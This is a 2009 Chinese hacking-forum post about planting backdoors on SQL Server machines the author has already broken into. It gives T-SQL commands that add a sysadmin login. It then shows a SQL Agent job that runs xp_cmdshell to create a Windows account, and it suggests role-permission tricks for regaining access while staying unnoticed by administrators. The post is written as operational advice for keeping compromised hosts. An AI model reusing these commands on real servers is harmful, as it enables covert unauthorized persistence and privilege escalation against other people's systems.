找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1306|回复: 0

关于sql server后门

[复制链接]

570

主题

-50

回帖

115

牛毛

一级牛人

积分
115
发表于 2009-9-21 10:46:21 | 显示全部楼层 |阅读模式 来自 安徽省合肥市
一般来说我们拿到一台服务器以后为了长期留住都会留后门,关于留后门这个东西这里不在讨论范围之内 有空我写个帖子大家研究下
一般sql server后门最常用的就是
exec master.dbo.sp_addlogin iisloger,hook;
exec master.dbo.sp_addsrvrolemember iisloger,sysadmin 加一个SA用户 . 但是这样很容易被管理员发现.
那天有人问我可不可以建个sql server隐藏用户 这个我到是没用过 . 一般喜欢down掉hash来跑密码 这样容易留住肉鸡
现在又想到了一个新的方法. 就是拿到服务器以后 net start SQLSERVERAGENT 一下 这样就启动了sql server 的
agent服务 一般的管理员很少去注意这个. 这样就给我们留出的空间。 这样我们只要记录服务器的DB或者public密码
下回就可以直接拿到服务器了 具体方法我写过文章了 就是
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "net user iisloger hook ./add> c:\fish.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '这里是你的SQL服务器名' //这里只要select host_name()就有了
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
这样即使我们下次旁注拿到一个DB权限的密码档也一样可以提权了. 不过这里有个弊端 就是一旦被别人拿到密码对方一样可以
通过angent来提权, 这里就要注意到一些保护肉鸡的方法了.
最后还有一个就是可以给sql server的public或者db权限赋予执行某个特定存储过程的权限, 这样也是可以做为我们
一个后门来XX 或者只要master有绝对权限一样可以XX下 哈哈...
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-28 18:29 , Processed in 0.145443 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表